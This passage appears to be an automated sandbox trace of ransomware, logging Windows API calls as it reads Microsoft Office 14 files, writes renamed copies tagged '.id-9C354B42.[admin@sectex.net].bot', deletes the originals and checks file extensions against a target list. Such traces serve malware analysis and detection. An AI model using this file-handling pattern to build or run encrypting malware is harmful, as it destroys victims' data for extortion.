	[0168.633] CloseHandle (hObject=0x25c) returned 1
	[0168.633] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0168.633] SetEndOfFile (hFile=0x3a4) returned 1
	[0168.635] CloseHandle (hObject=0x3a4) returned 1
	[0168.635] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKDECL.ICO.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0168.635] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKDECL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\taskdecl.ico")) returned 1
	[0168.637] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKDECL.ICO") returned 66
	[0168.637] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKDECL.ICO") returned 66
	[0168.637] lstrlenW (lpString=".doc") returned 4
	[0168.637] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0168.637] lstrlenW (lpString=".docx") returned 5
	[0168.637] lstrcmpiW (lpString1=".docx", lpString2="L.ICO") returned -1
	[0168.637] lstrlenW (lpString=".pdf") returned 4
	[0168.637] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0168.637] lstrlenW (lpString=".xls") returned 4
	[0168.637] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0168.637] lstrlenW (lpString=".xlsx") returned 5
	[0168.637] lstrcmpiW (lpString1=".xlsx", lpString2="L.ICO") returned -1
	[0168.637] lstrlenW (lpString=".ppt") returned 4
	[0168.637] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0168.637] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKDECL.ICO") returned 66
	[0168.637] lstrlenW (lpString=".zip") returned 4
	[0168.637] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0168.637] lstrlenW (lpString=".rar") returned 4
	[0168.637] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0168.637] lstrlenW (lpString=".bz2") returned 4
	[0168.637] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0168.637] lstrlenW (lpString=".7z") returned 3
	[0168.637] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0168.637] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKDECL.ICO") returned 66
	[0168.637] lstrlenW (lpString=".dbf") returned 4
	[0168.637] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0168.637] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKDECL.ICO") returned 66
	[0168.637] lstrlenW (lpString=".1cd") returned 4
	[0168.637] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0168.637] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKDECL.ICO") returned 66
	[0168.637] lstrlenW (lpString=".jpg") returned 4
	[0168.637] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0168.637] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKDECL.ICO") returned 66
	[0168.638] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKDECL.ICO") returned 66
	[0168.638] lstrlenW (lpString=".doc") returned 4
	[0168.638] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0168.638] lstrlenW (lpString=".docx") returned 5
	[0168.638] lstrcmpiW (lpString1=".docx", lpString2="L.ICO") returned -1
	[0168.638] lstrlenW (lpString=".pdf") returned 4
	[0168.638] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0168.638] lstrlenW (lpString=".xls") returned 4
	[0168.638] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0168.638] lstrlenW (lpString=".xlsx") returned 5
	[0168.638] lstrcmpiW (lpString1=".xlsx", lpString2="L.ICO") returned -1
	[0168.638] lstrlenW (lpString=".ppt") returned 4
	[0168.638] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0168.638] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKDECL.ICO") returned 66
	[0168.638] lstrlenW (lpString=".zip") returned 4
	[0168.638] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0168.638] lstrlenW (lpString=".rar") returned 4
	[0168.638] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0168.638] lstrlenW (lpString=".bz2") returned 4
	[0168.638] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0168.638] lstrlenW (lpString=".7z") returned 3
	[0168.638] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0168.638] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKDECL.ICO") returned 66
	[0168.638] lstrlenW (lpString=".dbf") returned 4
	[0168.638] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0168.638] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKDECL.ICO") returned 66
	[0168.638] lstrlenW (lpString=".1cd") returned 4
	[0168.638] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0168.638] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKDECL.ICO") returned 66
	[0168.638] lstrlenW (lpString=".jpg") returned 4
	[0168.638] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0168.639] lstrcmpiW (lpString1=".ICO", lpString2=".bot") returned 1
	[0168.639] lstrlenW (lpString="TASKDECS.ICO") returned 12
	[0168.639] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKDECS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\taskdecs.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4
	[0168.639] GetFileSizeEx (in: hFile=0x3a4, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=2998) returned 1
	[0168.639] CloseHandle (hObject=0x3a4) returned 1
	[0168.639] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKDECS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\taskdecs.ico")) returned 0x20
	[0168.639] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKDECS.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\taskdecs.ico.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0168.639] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKDECS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\taskdecs.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4
	[0168.640] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0168.640] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0168.640] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKDECS.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\taskdecs.ico.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0168.640] GetLastError () returned 0x0
	[0168.640] ReadFile (in: hFile=0x3a4, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0xbb6, lpOverlapped=0x0) returned 1
	[0168.642] WriteFile (in: hFile=0x25c, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xbc0, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xbc0, lpOverlapped=0x0) returned 1
	[0168.642] ReadFile (in: hFile=0x3a4, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0168.643] WriteFile (in: hFile=0x25c, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0168.643] SetEndOfFile (hFile=0x25c) returned 1
	[0168.643] CloseHandle (hObject=0x25c) returned 1
	[0168.643] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0168.643] SetEndOfFile (hFile=0x3a4) returned 1
	[0168.645] CloseHandle (hObject=0x3a4) returned 1
	[0168.645] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKDECS.ICO.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0168.645] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKDECS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\taskdecs.ico")) returned 1
	[0168.646] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKDECS.ICO") returned 66
	[0168.646] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKDECS.ICO") returned 66
	[0168.646] lstrlenW (lpString=".doc") returned 4
	[0168.646] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0168.646] lstrlenW (lpString=".docx") returned 5
	[0168.646] lstrcmpiW (lpString1=".docx", lpString2="S.ICO") returned -1
	[0168.646] lstrlenW (lpString=".pdf") returned 4
	[0168.646] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0168.646] lstrlenW (lpString=".xls") returned 4
	[0168.646] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0168.646] lstrlenW (lpString=".xlsx") returned 5
	[0168.646] lstrcmpiW (lpString1=".xlsx", lpString2="S.ICO") returned -1
	[0168.646] lstrlenW (lpString=".ppt") returned 4
	[0168.646] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0168.646] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKDECS.ICO") returned 66
	[0168.646] lstrlenW (lpString=".zip") returned 4
	[0168.646] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0168.646] lstrlenW (lpString=".rar") returned 4
	[0168.646] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0168.646] lstrlenW (lpString=".bz2") returned 4
	[0168.646] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0168.646] lstrlenW (lpString=".7z") returned 3
	[0168.646] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0168.646] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKDECS.ICO") returned 66
	[0168.646] lstrlenW (lpString=".dbf") returned 4
	[0168.646] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0168.646] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKDECS.ICO") returned 66
	[0168.647] lstrlenW (lpString=".1cd") returned 4
	[0168.647] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0168.647] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKDECS.ICO") returned 66
	[0168.647] lstrlenW (lpString=".jpg") returned 4
	[0168.647] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0168.647] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKDECS.ICO") returned 66
	[0168.647] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKDECS.ICO") returned 66
	[0168.647] lstrlenW (lpString=".doc") returned 4
	[0168.647] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0168.647] lstrlenW (lpString=".docx") returned 5
	[0168.647] lstrcmpiW (lpString1=".docx", lpString2="S.ICO") returned -1
	[0168.647] lstrlenW (lpString=".pdf") returned 4
	[0168.647] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0168.647] lstrlenW (lpString=".xls") returned 4
	[0168.647] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0168.647] lstrlenW (lpString=".xlsx") returned 5
	[0168.647] lstrcmpiW (lpString1=".xlsx", lpString2="S.ICO") returned -1
	[0168.647] lstrlenW (lpString=".ppt") returned 4
	[0168.647] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0168.647] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKDECS.ICO") returned 66
	[0168.647] lstrlenW (lpString=".zip") returned 4
	[0168.647] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0168.647] lstrlenW (lpString=".rar") returned 4
	[0168.647] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0168.647] lstrlenW (lpString=".bz2") returned 4
	[0168.647] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0168.647] lstrlenW (lpString=".7z") returned 3
	[0168.647] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0168.647] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKDECS.ICO") returned 66
	[0168.647] lstrlenW (lpString=".dbf") returned 4
	[0168.647] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0168.647] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKDECS.ICO") returned 66
	[0168.647] lstrlenW (lpString=".1cd") returned 4
	[0168.647] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0168.647] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKDECS.ICO") returned 66
	[0168.648] lstrlenW (lpString=".jpg") returned 4
	[0168.648] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0168.648] lstrcmpiW (lpString1=".ICO", lpString2=".bot") returned 1
	[0168.648] lstrlenW (lpString="TASKL.ICO") returned 9
	[0168.648] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\taskl.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4
	[0168.648] GetFileSizeEx (in: hFile=0x3a4, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=1078) returned 1
	[0168.648] CloseHandle (hObject=0x3a4) returned 1
	[0168.648] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\taskl.ico")) returned 0x20
	[0168.648] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKL.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\taskl.ico.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0168.649] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\taskl.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4
	[0168.649] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0168.649] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0168.649] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKL.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\taskl.ico.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0168.650] GetLastError () returned 0x0
	[0168.650] ReadFile (in: hFile=0x3a4, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x436, lpOverlapped=0x0) returned 1
	[0168.792] WriteFile (in: hFile=0x25c, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x440, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x440, lpOverlapped=0x0) returned 1
	[0168.793] ReadFile (in: hFile=0x3a4, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0168.793] WriteFile (in: hFile=0x25c, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xe6, lpOverlapped=0x0) returned 1
	[0168.793] SetEndOfFile (hFile=0x25c) returned 1
	[0168.793] CloseHandle (hObject=0x25c) returned 1
	[0168.793] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0168.793] SetEndOfFile (hFile=0x3a4) returned 1
	[0168.795] CloseHandle (hObject=0x3a4) returned 1
	[0168.795] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKL.ICO.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0168.795] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\taskl.ico")) returned 1
	[0168.796] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKL.ICO") returned 63
	[0168.796] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKL.ICO") returned 63
	[0168.796] lstrlenW (lpString=".doc") returned 4
	[0168.796] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0168.796] lstrlenW (lpString=".docx") returned 5
	[0168.796] lstrcmpiW (lpString1=".docx", lpString2="L.ICO") returned -1
	[0168.796] lstrlenW (lpString=".pdf") returned 4
	[0168.796] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0168.796] lstrlenW (lpString=".xls") returned 4
	[0168.796] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0168.796] lstrlenW (lpString=".xlsx") returned 5
	[0168.796] lstrcmpiW (lpString1=".xlsx", lpString2="L.ICO") returned -1
	[0168.796] lstrlenW (lpString=".ppt") returned 4
	[0168.796] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0168.796] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKL.ICO") returned 63
	[0168.797] lstrlenW (lpString=".zip") returned 4
	[0168.797] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0168.797] lstrlenW (lpString=".rar") returned 4
	[0168.797] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0168.797] lstrlenW (lpString=".bz2") returned 4
	[0168.797] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0168.797] lstrlenW (lpString=".7z") returned 3
	[0168.797] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0168.797] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKL.ICO") returned 63
	[0168.797] lstrlenW (lpString=".dbf") returned 4
	[0168.797] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0168.797] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKL.ICO") returned 63
	[0168.797] lstrlenW (lpString=".1cd") returned 4
	[0168.797] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0168.797] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKL.ICO") returned 63
	[0168.797] lstrlenW (lpString=".jpg") returned 4
	[0168.797] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0168.797] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKL.ICO") returned 63
	[0168.797] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKL.ICO") returned 63
	[0168.797] lstrlenW (lpString=".doc") returned 4
	[0168.797] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0168.797] lstrlenW (lpString=".docx") returned 5
	[0168.797] lstrcmpiW (lpString1=".docx", lpString2="L.ICO") returned -1
	[0168.797] lstrlenW (lpString=".pdf") returned 4
	[0168.797] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0168.797] lstrlenW (lpString=".xls") returned 4
	[0168.797] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0168.797] lstrlenW (lpString=".xlsx") returned 5
	[0168.797] lstrcmpiW (lpString1=".xlsx", lpString2="L.ICO") returned -1
	[0168.797] lstrlenW (lpString=".ppt") returned 4
	[0168.797] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0168.797] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKL.ICO") returned 63
	[0168.797] lstrlenW (lpString=".zip") returned 4
	[0168.797] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0168.797] lstrlenW (lpString=".rar") returned 4
	[0168.798] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0168.798] lstrlenW (lpString=".bz2") returned 4
	[0168.798] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0168.798] lstrlenW (lpString=".7z") returned 3
	[0168.798] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0168.798] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKL.ICO") returned 63
	[0168.798] lstrlenW (lpString=".dbf") returned 4
	[0168.798] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0168.798] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKL.ICO") returned 63
	[0168.798] lstrlenW (lpString=".1cd") returned 4
	[0168.798] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0168.798] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKL.ICO") returned 63
	[0168.798] lstrlenW (lpString=".jpg") returned 4
	[0168.798] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0168.798] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0168.798] lstrlenW (lpString="GANTT.DLL") returned 9
	[0168.798] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\GANTT.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\gantt.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4
	[0168.860] GetFileSizeEx (in: hFile=0x3a4, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=1561448) returned 1
	[0168.860] CloseHandle (hObject=0x3a4) returned 1
	[0168.860] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\GANTT.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\gantt.dll")) returned 0x20
	[0168.860] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\GANTT.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\gantt.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0168.860] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\GANTT.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\gantt.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0168.860] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\GANTT.DLL") returned 52
	[0168.860] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\GANTT.DLL") returned 52
	[0168.860] lstrlenW (lpString=".doc") returned 4
	[0168.860] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0168.860] lstrlenW (lpString=".docx") returned 5
	[0168.860] lstrcmpiW (lpString1=".docx", lpString2="T.DLL") returned -1
	[0168.860] lstrlenW (lpString=".pdf") returned 4
	[0168.860] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0168.860] lstrlenW (lpString=".xls") returned 4
	[0168.860] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0168.860] lstrlenW (lpString=".xlsx") returned 5
	[0168.860] lstrcmpiW (lpString1=".xlsx", lpString2="T.DLL") returned -1
	[0168.860] lstrlenW (lpString=".ppt") returned 4
	[0168.860] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0168.861] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\GANTT.DLL") returned 52
	[0168.861] lstrlenW (lpString=".zip") returned 4
	[0168.861] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0168.861] lstrlenW (lpString=".rar") returned 4
	[0168.861] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0168.861] lstrlenW (lpString=".bz2") returned 4
	[0168.861] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0168.861] lstrlenW (lpString=".7z") returned 3
	[0168.861] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0168.861] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\GANTT.DLL") returned 52
	[0168.861] lstrlenW (lpString=".dbf") returned 4
	[0168.861] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0168.861] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\GANTT.DLL") returned 52
	[0168.861] lstrlenW (lpString=".1cd") returned 4
	[0168.861] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0168.861] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\GANTT.DLL") returned 52
	[0168.861] lstrlenW (lpString=".jpg") returned 4
	[0168.861] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0168.861] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\GANTT.DLL") returned 52
	[0168.861] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\GANTT.DLL") returned 52
